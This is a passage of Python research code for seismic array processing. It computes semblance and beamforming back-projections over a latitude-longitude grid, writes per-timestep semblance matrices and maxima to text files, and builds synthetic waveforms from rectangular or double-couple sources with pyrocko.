(return fallback time)' % (dist, z))\n want = None\n else:\n want = self.phase_selector(arrivals)\n self.arrivals[(dist, z)] = want\n if get_ray:\n return want\n else:\n return self.return_time(want)\n\n def phase_selector(self, _list):\n if self.which == 'first':\n return min(_list, key=lambda x: x.t)\n if self.which == 'last':\n return max(_list, key=lambda x: x.t)\n\n def strip(self, ps):\n ps = ps.replace(self.which, '')\n ps = ps.rstrip(')')\n ps = ps.lstrip('(')\n return ps\n\n\nclass Timings(Object):\n timings = List.T(CakeTiming.T())\n\n def __init__(self, timings):\n self.timings = timings\n\n\nclass SembMax (object):\n '''\n class to store sembmax object for each grid point\n '''\n\n def __init__(self, lat, lon, semb):\n\n self.lat = lat\n self.lon = lon\n self.semb = semb\n\n# -------------------------------------------------------------------------------------------------\n\nclass FileSembMax(object):\n '''\n class to strore sembmax object for the sembmaxvalue file\n '''\n def __init__(self,istep,sembmaxX,sembmaxY,sembmax,usedarrays,delta,azi,deltakm):\n\n self.istep = istep\n self.sembmaxX = sembmaxX\n self.sembmaxY = sembmaxY\n self.sembmax= sembmax\n self.usedarrays = usedarrays\n self.delta = delta\n self.azi= azi\n self.deltakm= deltakm\n\n def get(self):\n return ('%d %.2f %.2f %f %d %03f %f %03f\\n' % (self.istep,self.sembmaxX,self.sembmaxY,\n self.sembmax,self.usedarrays,self.delta,\n self.azi,self.delta*119.19))\n\n# -------------------------------------------------------------------------------------------------\n\ndef toAzimuth (latevent,lonevent,latsource,lonsource):\n '''\n method to calculate azimuth between two points\n '''\n # Convert to radians.\n lat1 = radians (latsource);\n lon1 = radians (lonsource);\n lat2 = radians (latevent);\n lon2 = radians (lonevent);\n\n # Compute the angle.\n x = sin(lon1-lon2 ) * cos(lat2);\n y = cos(lat1) * sin(lat2) - sin(lat1) * cos(lat2) * cos(lon1-lon2);\n angle = -atan2 (x,y);\n\n if angle < 0.0 :\n angle += math.pi * 2.0;\n\n #And convert result to degrees.\n angle = math.degrees (angle)\n angle = '%02f'%angle\n\n return angle;\n\n# -------------------------------------------------------------------------------------------------\n\ndef writeSembMatricesSingleArray (SembList,Config,Origin,arrayfolder,ntimes,switch):\n '''\n method to write semblance matrizes from one processes to file for each timestep\n '''\n logger.info ('start write semblance matrices')\n\n cfg= ConfigObj (dict=Config)\n origin = OriginCfg (Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv = []\n lonv = []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0:\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j * gridspacing\n\n if o==0 and j==0: Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n #endfor\n\n rc = UTCDateTime (Origin['time'])\n rcs = '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n\n for a, i in enumerate(SembList):\n #logger.info('timestep %d' % a)\n\n fobj = open (os.path.join (arrayfolder,'%s-%s_%03d.ASC' % (switch,Origin['depth'],a)),'w')\n fobj.write ('# %s , %s\\n' % 
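# CakeTiming resolves its phase-selection string against a pyrocko cake model
# once per (depth, distance) pair and caches the resulting ray. A usage sketch
# with illustrative numbers; note that t() expects the distance in meters and
# converts internally with cake.m2d.
from pyrocko import cake

mod = cake.load_model()  # pyrocko's default built-in earth model
timing = CakeTiming(phase_selection='first(p|P)-20', fallback_time=100.)
depth = 10 * km                # 10 km deep source
distance = 30. / cake.m2d      # 30 degrees of arc, expressed in meters
print(timing.t(mod, (depth, distance)))  # first P onset minus the 20 s offset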
(d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n for j in range (migpoints):\n x= latv[j]\n y= lonv[j]\n z= origin.depth() # float(Origin['depth'])\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.2f %.20f\\n' % (x,y,z,semb))\n #endfor\n\n fobj.close()\n #endfor\n\n# -------------------------------------------------------------------------------------------------\n\ndef collectSemb (SembList,Config,Origin,Folder,ntimes,arrays,switch):\n '''\n method to collect semblance matrizes from all processes and write them to file for each timestep\n '''\n Logfile.add ('start collect in collectSemb')\n\n cfg= ConfigObj (dict=Config)\n origin = ConfigObj (dict=Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv= []\n lonv= []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0 :\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j*gridspacing\n\n if o==0 and j==0:\n Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n\n\n tmp=1\n for a in SembList:\n tmp *= a\n #sys.exit()\n\n sembmaxvaluev = num.ndarray (ntimes,dtype=float)\n sembmaxlatv = num.ndarray (ntimes,dtype=float)\n sembmaxlonv = num.ndarray (ntimes,dtype=float)\n\n rc= UTCDateTime(Origin['time'])\n rcs= '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n usedarrays = 5\n\n folder = Folder['semb']\n fobjsembmax = open (os.path.join (folder,'sembmax_%s.txt' % (switch)),'w')\n for a, i in enumerate(tmp):\n logger.info('timestep %d' % a)\n\n\n fobj = open (os.path.join (folder,'%s-%s_%03d.ASC' % (switch,Origin['depth'],a)),'w')\n #fobj = open (os.path.join (folder, '%03d.ASC' % a),'w')\n\n fobj.write ('# %s , %s\\n' % (d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n\n origin = DataTypes.dictToLocation (Origin)\n uncert = num.std(i) #maybe not std?\n for j in range(migpoints):\n x= latv[j]\n y= lonv[j]\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.20f\\n' % (x,y,semb))\n\n if semb > sembmax:\n sembmax = semb;# search for maximum and position of maximum on semblance grid for given time step\n sembmaxX = x;\n sembmaxY = y;\n\n delta = loc2degrees (Location (sembmaxX, sembmaxY), origin)\n azi = toAzimuth (float(Origin['lat']), float(Origin['lon']),float(sembmaxX), float(sembmaxY))\n\n sembmaxvaluev[a] = sembmax\n sembmaxlatv[a] = sembmaxX\n sembmaxlonv[a] = sembmaxY\n\n fobjsembmax.write ('%d %.2f %.2f %.20f %.20f %d %03f %f %03f\\n' % (a*step,sembmaxX,sembmaxY,sembmax,uncert,usedarrays,delta,float(azi),delta*119.19))\n fobj.close()\n\n\n fobjsembmax.close()\n\n durationpath = os.path.join (folder, 
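# toAzimuth() implements the standard forward-azimuth formula from the source
# point to the event point and returns the angle as a '%02f'-formatted string.
# A cross-check sketch against pyrocko's orthodrome.azimuth; the coordinates
# are made up, and the string result is cast back to float for comparison.
from pyrocko import orthodrome

lat_src, lon_src = 52.5, 13.4   # illustrative source
lat_ev, lon_ev = 48.1, 11.6     # illustrative event
azi_own = float(toAzimuth(lat_ev, lon_ev, lat_src, lon_src))
azi_ref = orthodrome.azimuth(lat_src, lon_src, lat_ev, lon_ev) % 360.
print(azi_own, azi_ref)  # the two should agree closely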
\"duration.txt\")\n trigger.writeSembMaxValue (sembmaxvaluev,sembmaxlatv,sembmaxlonv,ntimes,Config,Folder)\n trigger.semblancestalta (sembmaxvaluev,sembmaxlatv,sembmaxlonv)\n\ndef collectSembweighted(SembList,Config,Origin,Folder,ntimes,arrays,switch, weights):\n '''\n method to collect semblance matrizes from all processes and write them to file for each timestep\n '''\n Logfile.add ('start collect in collectSemb')\n\n cfg= ConfigObj (dict=Config)\n origin = ConfigObj (dict=Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv= []\n lonv= []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0 :\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j*gridspacing\n\n if o==0 and j==0:\n Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n\n\n tmp=1\n for a, w in zip(SembList, weights):\n tmp *= a\n #sys.exit()\n\n sembmaxvaluev = num.ndarray (ntimes,dtype=float)\n sembmaxlatv = num.ndarray (ntimes,dtype=float)\n sembmaxlonv = num.ndarray (ntimes,dtype=float)\n\n rc= UTCDateTime(Origin['time'])\n rcs= '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n usedarrays = 5\n\n folder = Folder['semb']\n fobjsembmax = open (os.path.join (folder,'sembmax_%s.txt' % (switch)),'w')\n\n for a, i in enumerate(tmp):\n logger.info('timestep %d' % a)\n\n\n fobj = open (os.path.join (folder,'%s-%s_%03d._weighted_semblance.ASC' % (switch,Origin['depth'],a)),'w')\n #fobj = open (os.path.join (folder, '%03d.ASC' % a),'w')\n\n fobj.write ('# %s , %s\\n' % (d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n\n origin = DataTypes.dictToLocation (Origin)\n uncert = num.std(i) #maybe not std?\n for j in range(migpoints):\n x= latv[j]\n y= lonv[j]\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.20f\\n' % (x,y,semb))\n\n if semb > sembmax:\n sembmax = semb;# search for maximum and position of maximum on semblance grid for given time step\n sembmaxX = x;\n sembmaxY = y;\n\n delta = loc2degrees (Location (sembmaxX, sembmaxY), origin)\n azi = toAzimuth (float(Origin['lat']), float(Origin['lon']),float(sembmaxX), float(sembmaxY))\n\n sembmaxvaluev[a] = sembmax\n sembmaxlatv[a] = sembmaxX\n sembmaxlonv[a] = sembmaxY\n\n fobjsembmax.write ('%d %.2f %.2f %.20f %.20f %d %03f %f %03f\\n' % (a*step,sembmaxX,sembmaxY,sembmax,uncert,usedarrays,delta,float(azi),delta*119.19))\n fobj.close()\n\n\n fobjsembmax.close()\n\n durationpath = os.path.join (folder, \"duration.txt\")\n trigger.writeSembMaxValue (sembmaxvaluev,sembmaxlatv,sembmaxlonv,ntimes,Config,Folder)\n trigger.semblancestalta (sembmaxvaluev,sembmaxlatv,sembmaxlonv)\n\ndef toMatrix (npVector, nColumns) :\n\n t = npVector.tolist()[0]\n n = nColumns\n mat = []\n\n for i in range (len(t) / n) :\n pos1 = i * n\n pos2 = pos1 + n\n slice = t [pos1:pos2]\n assert len(slice) == nColumns\n mat.append (slice)\n\n 
return mat\n\n\n\n\ndef doCalc (flag,Config,WaveformDict,FilterMetaData,Gmint,Gmaxt,TTTGridMap,Folder,Origin, ntimes, switch, ev,arrayfolder, syn_in):\n '''\n method for calculating semblance of one station array\n '''\n Logfile.add ('PROCESS %d %s' % (flag,' Enters Semblance Calculation') )\n Logfile.add ('MINT : %f MAXT: %f Traveltime' % (Gmint,Gmaxt))\n\n cfg = ConfigObj (dict=Config)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n new_frequence = cfg.newFrequency() #('new_frequence')\n forerun= cfg.Int('forerun')\n duration= cfg.Int('duration')\n gridspacing = cfg.Float('gridspacing')\n\n nostat = len (WaveformDict)\n traveltimes = {}\n recordstarttime = ''\n minSampleCount = 999999999\n\n if cfg.UInt ('forerun')>0:\n ntimes = int ((cfg.UInt ('forerun') + cfg.UInt ('duration') ) / cfg.UInt ('step') )\n else:\n ntimes = int ((cfg.UInt ('duration') ) / cfg.UInt ('step') )\n nsamp = int (winlen * new_frequence)\n nstep = int (step * new_frequence)\n from pyrocko import obspy_compat\n from pyrocko import orthodrome, model\n obspy_compat.plant()\n\n ############################################################################\n calcStreamMap = WaveformDict\n\n stations = []\n py_trs = []\n for trace in calcStreamMap.keys():\n py_tr = obspy_compat.to_pyrocko_trace(calcStreamMap[trace])\n py_trs.append(py_tr)\n for il in FilterMetaData:\n if str(il) == str(trace):\n szo = model.Station(lat=il.lat, lon=il.lon,\n station=il.sta, network=il.net,\n channels=py_tr.channel,\n elevation=il.ele, location=il.loc)\n stations.append(szo) #right number of stations?\n\n\n#==================================synthetic BeamForming=======================================\n\n if cfg.Bool('shift_by_phase_pws') == True:\n calcStreamMapshifted= calcStreamMap.copy()\n from obspy.core import stream\n stream = stream.Stream()\n for trace in calcStreamMapshifted.keys():\n stream.append(calcStreamMapshifted[trace])\n pws_stack = PWS_stack([stream], weight=2, normalize=True)\n for tr in pws_stack:\n for trace in calcStreamMapshifted.keys():\n calcStreamMapshifted[trace]=tr\n calcStreamMap = calcStreamMapshifted\n\n\n if cfg.Bool('shift_by_phase_onset') == True:\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n for trace in calcStreamMapshifted.keys():\n recordstarttime = calcStreamMapshifted[trace].stats.starttime.timestamp\n recordendtime = calcStreamMapshifted[trace].stats.endtime.timestamp\n mod = shifted_traces[i]\n extracted = mod.chop(recordstarttime, recordendtime, inplace=False)\n shifted_obs_tr = obspy_compat.to_obspy_trace(extracted)\n calcStreamMapshifted[trace]=shifted_obs_tr\n i = i+1\n\n calcStreamMap = calcStreamMapshifted\n\n\n weight = 0.\n if 
cfg.Bool('weight_by_noise') == True:\n from noise_analyser import analyse\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n weight = analyse(shifted_traces, engine, event, stations,\n 100., store_id, nwindows=1,\n check_events=True, phase_def='P')\n\n for trace in calcStreamMap.keys():\n recordstarttime = calcStreamMap[trace].stats.starttime\n d = calcStreamMap[trace].stats.starttime\n d = d.timestamp\n\n if calcStreamMap[trace].stats.npts < minSampleCount:\n minSampleCount = calcStreamMap[trace].stats.npts\n\n ############################################################################\n traces = num.ndarray (shape=(len(calcStreamMap), minSampleCount), dtype=float)\n traveltime = num.ndarray (shape=(len(calcStreamMap), dimX*dimY), dtype=float)\n latv = num.ndarray (dimX*dimY, dtype=float)\n lonv = num.ndarray (dimX*dimY, dtype=float)\n ############################################################################\n\n\n c=0\n streamCounter = 0\n\n for key in calcStreamMap.keys():\n streamID = key\n c2 = 0\n\n for o in calcStreamMap[key]:\n if c2 < minSampleCount:\n traces[c][c2] = o\n\n c2 += 1\n\n\n for key in TTTGridMap.keys():\n\n if streamID == key:\n traveltimes[streamCounter] = TTTGridMap[key]\n else:\n \"NEIN\", streamID, key\n\n\n if not streamCounter in traveltimes :\n continue #hs : thread crashed before\n\n g = traveltimes[streamCounter]\n dimZ = g.dimZ\n mint = g.mint\n maxt = g.maxt\n Latul = g.Latul\n Lonul = g.Lonul\n Lator = g.Lator\n Lonor = g.Lonor\n\n gridElem = g.GridArray\n\n for x in range(dimX):\n for y in range(dimY):\n elem = gridElem[x, y]\n\n traveltime [c][x * dimY + y] = elem.tt\n latv [x * dimY + y] = elem.lat\n lonv [x * dimY + y] = elem.lon\n #endfor\n\n c += 1\n streamCounter += 1\n\n #endfor\n\n\n# ==================================semblance calculation=======\n\n t1 = time.time()\n traces = traces.reshape(1, nostat*minSampleCount)\n\n traveltimes = traveltime.reshape(1, nostat*dimX*dimY)\n TTTGrid = True\n manual_shift = False\n\n if manual_shift:\n\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs = []\n calcStreamMapshifted = calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(\n calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n backSemb = num.ndarray(shape=(ntimes, dimX*dimY), dtype=float)\n bf = BeamForming(stations, traces, normalize=True)\n\n for i in range(ntimes):\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n for j in range(dimX * dimY):\n event = model.Event(lat=float(latv[j]), lon=float(lonv[j]),\n depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n shifted_traces, 
stack = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(\n directory,\n 'array_center.pf'),\n fn_beam=pjoin(directory,\n 'beam.mseed'))\n tmin = stack.tmin+(i*nstep)+20\n tmax = stack.tmin+(i*nstep)+60\n stack.chop(tmin, tmax)\n backSemb[i][j] = abs(sum(stack.ydata))\n\n k = backSemb\n TTTGrid = False\n\n if TTTGrid:\n start_time = time.time()\n if cfg.UInt('forerun') > 0:\n ntimes = int((cfg.UInt('forerun') + cfg.UInt('duration'))/step)\n else:\n ntimes = int((cfg.UInt('duration')) / step)\n nsamp = int(winlen)\n nstep = int(step)\n Gmint = cfg.Int('forerun')\n\n k = semblance(maxp, nostat, nsamp, ntimes, nstep, dimX, dimY, Gmint,\n new_frequence, minSampleCount, latv, lonv, traveltimes,\n traces, calcStreamMap, timeev, Config, Origin)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n t2 = time.time()\n\n Logfile.add('%s took %0.3f s' % ('CALC:',(t2-t1)))\n\n partSemb = k\n partSemb = partSemb.reshape(ntimes, migpoints)\n\n return partSemb\n\n\ndef doCalc_syn (flag,Config,WaveformDict,FilterMetaData,Gmint,Gmaxt,TTTGridMap,\n Folder,Origin, ntimes, switch, ev,arrayfolder, syn_in, parameter):\n '''\n method for calculating semblance of one station array\n '''\n Logfile.add ('PROCESS %d %s' % (flag,' Enters Semblance Calculation') )\n Logfile.add ('MINT : %f MAXT: %f Traveltime' % (Gmint,Gmaxt))\n\n cfg = ConfigObj (dict=Config)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n new_frequence = cfg.newFrequency() #('new_frequence')\n forerun= cfg.Int('forerun')\n duration= cfg.Int('duration')\n gridspacing = cfg.Float('gridspacing')\n\n nostat = len (WaveformDict)\n traveltimes = {}\n recordstarttime = ''\n minSampleCount = 999999999\n\n if cfg.UInt ('forerun')>0:\n ntimes = int ((cfg.UInt ('forerun') + cfg.UInt ('duration') ) / cfg.UInt ('step') )\n else:\n ntimes = int ((cfg.UInt ('duration') ) / cfg.UInt ('step') )\n nsamp = int (winlen * new_frequence)\n nstep = int (step * new_frequence)\n from pyrocko import obspy_compat\n from pyrocko import orthodrome, model\n obspy_compat.plant()\n\n ############################################################################\n calcStreamMap = WaveformDict\n\n stations = []\n py_trs = []\n for trace in calcStreamMap.keys():\n py_tr = obspy_compat.to_pyrocko_trace(calcStreamMap[trace])\n py_trs.append(py_tr)\n for il in FilterMetaData:\n if str(il) == str(trace):\n szo = model.Station(lat=il.lat, lon=il.lon,\n station=il.sta, network=il.net,\n channels=py_tr.channel,\n elevation=il.ele, location=il.loc)\n stations.append(szo) #right number of stations?\n\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n\n targets = []\n for st in stations:\n target = Target(\n lat=st.lat,\n lon=st.lon,\n store_id=store_id,\n codes=(st.network, st.station, st.location, 'BHZ'),\n tmin=-1900,\n tmax=3900,\n interpolation='multilinear',\n quantity=cfg.quantity())\n targets.append(target)\n\n if syn_in.nsources() == 1:\n if syn_in.use_specific_stf() is True:\n stf = syn_in.stf()\n exec(stf)\n else:\n stf = STF()\n if syn_in.source() == 'RectangularSource':\n source = RectangularSource(\n lat=float(syn_in.lat_0()),\n lon=float(syn_in.lon_0()),\n depth=syn_in.depth_syn_0()*1000.,\n strike=syn_in.strike_0(),\n dip=syn_in.dip_0(),\n rake=syn_in.rake_0(),\n width=syn_in.width_0()*1000.,\n length=syn_in.length_0()*1000.,\n nucleation_x=syn_in.nucleation_x_0(),\n slip=syn_in.slip_0(),\n 
nucleation_y=syn_in.nucleation_y_0(),\n stf=stf,\n time=util.str_to_time(syn_in.time_0()))\n if syn_in.source() == 'DCSource':\n source = DCSource(\n lat=float(syn_in.lat_0()),\n lon=float(syn_in.lon_0()),\n depth=syn_in.depth_syn_0()*1000.,\n strike=syn_in.strike_0(),\n dip=syn_in.dip_0(),\n rake=syn_in.rake_0(),\n stf=stf,\n time=util.str_to_time(syn_in.time_0()),\n magnitude=syn_in.magnitude_0())\n\n else:\n sources = []\n for i in range(syn_in.nsources()):\n if syn_in.use_specific_stf() is True:\n stf = syn_in.stf()\n exec(stf)\n\n else:\n stf = STF()\n if syn_in.source() == 'RectangularSource':\n sources.append(RectangularSource(\n lat=float(syn_in.lat_1(i)),\n lon=float(syn_in.lon_1(i)),\n depth=syn_in.depth_syn_1(i)*1000.,\n strike=syn_in.strike_1(i),\n dip=syn_in.dip_1(i),\n rake=syn_in.rake_1(i),\n width=syn_in.width_1(i)*1000.,\n length=syn_in.length_1(i)*1000.,\n nucleation_x=syn_in.nucleation_x_1(i),\n slip=syn_in.slip_1(i),\n nucleation_y=syn_in.nucleation_y_1(i),\n stf=stf,\n time=util.str_to_time(syn_in.time_1(i))))\n\n if syn_in.source() == 'DCSource':\n sources.append(DCSource(\n lat=float(syn_in.lat_1(i)),\n lon=float(syn_in.lon_1(i)),\n depth=syn_in.depth_1(i)*1000.,\n strike=syn_in.strike_1(i),\n dip=syn_in.dip_1(i),\n rake=syn_in.rake_1(i),\n stf=stf,\n time=util.str_to_time(syn_in.time_1(i)),\n magnitude=syn_in.magnitude_1(i)))\n source = CombiSource(subsources=sources)\n response = engine.process(source, targets)\n\n synthetic_traces = response.pyrocko_traces()\n if cfg.Bool('synthetic_test_add_noise') is True:\n from noise_addition import add_noise\n trs_orgs = []\n calcStreamMapsyn = calcStreamMap.copy()\n #from pyrocko import trace\n for tracex in calcStreamMapsyn.keys():\n for trl in synthetic_traces:\n if str(trl.name()[4:12]) == str(tracex[4:]):\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapsyn[tracex])\n tr_org.downsample_to(2.0)\n trs_orgs.append(tr_org)\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n synthetic_traces = add_noise(trs_orgs, engine, source.pyrocko_event(),\n stations,\n store_id, phase_def='P')\n trs_org = []\n trs_orgs = []\n fobj = os.path.join(arrayfolder, 'shift.dat')\n xy = num.loadtxt(fobj, usecols=1, delimiter=',')\n calcStreamMapsyn = calcStreamMap.copy()\n #from pyrocko import trace\n for tracex in calcStreamMapsyn.keys():\n for trl in synthetic_traces:\n if str(trl.name()[4:12])== str(tracex[4:]):\n mod = trl\n\n recordstarttime = calcStreamMapsyn[tracex].stats.starttime.timestamp\n recordendtime = calcStreamMapsyn[tracex].stats.endtime.timestamp\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapsyn[tracex])\n trs_orgs.append(tr_org)\n\n tr_org_add = mod.chop(recordstarttime, recordendtime, inplace=False)\n synthetic_obs_tr = obspy_compat.to_obspy_trace(tr_org_add)\n calcStreamMapsyn[tracex] = synthetic_obs_tr\n trs_org.append(tr_org_add)\n calcStreamMap = calcStreamMapsyn\n\n if cfg.Bool('shift_by_phase_pws') == True:\n calcStreamMapshifted= calcStreamMap.copy()\n from obspy.core import stream\n stream = stream.Stream()\n for trace in calcStreamMapshifted.keys():\n stream.append(calcStreamMapshifted[trace])\n pws_stack = PWS_stack([stream], weight=2, normalize=True)\n for tr in pws_stack:\n for trace in calcStreamMapshifted.keys():\n calcStreamMapshifted[trace]=tr\n calcStreamMap = calcStreamMapshifted\n\n\n if cfg.Bool('shift_by_phase_onset') == True:\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n 
for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n for trace in calcStreamMapshifted.keys():\n recordstarttime = calcStreamMapshifted[trace].stats.starttime.timestamp\n recordendtime = calcStreamMapshifted[trace].stats.endtime.timestamp\n mod = shifted_traces[i]\n extracted = mod.chop(recordstarttime, recordendtime, inplace=False)\n shifted_obs_tr = obspy_compat.to_obspy_trace(extracted)\n calcStreamMapshifted[trace]=shifted_obs_tr\n i = i+1\n\n calcStreamMap = calcStreamMapshifted\n\n\n weight = 0.\n if cfg.Bool('weight_by_noise') == True:\n from noise_analyser import analyse\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n weight = analyse(shifted_traces, engine, event, stations,\n 100., store_id, nwindows=1,\n check_events=True, phase_def='P')\n\n for trace in calcStreamMap.keys():\n recordstarttime = calcStreamMap[trace].stats.starttime\n d = calcStreamMap[trace].stats.starttime\n d = d.timestamp\n\n if calcStreamMap[trace].stats.npts < minSampleCount:\n minSampleCount = 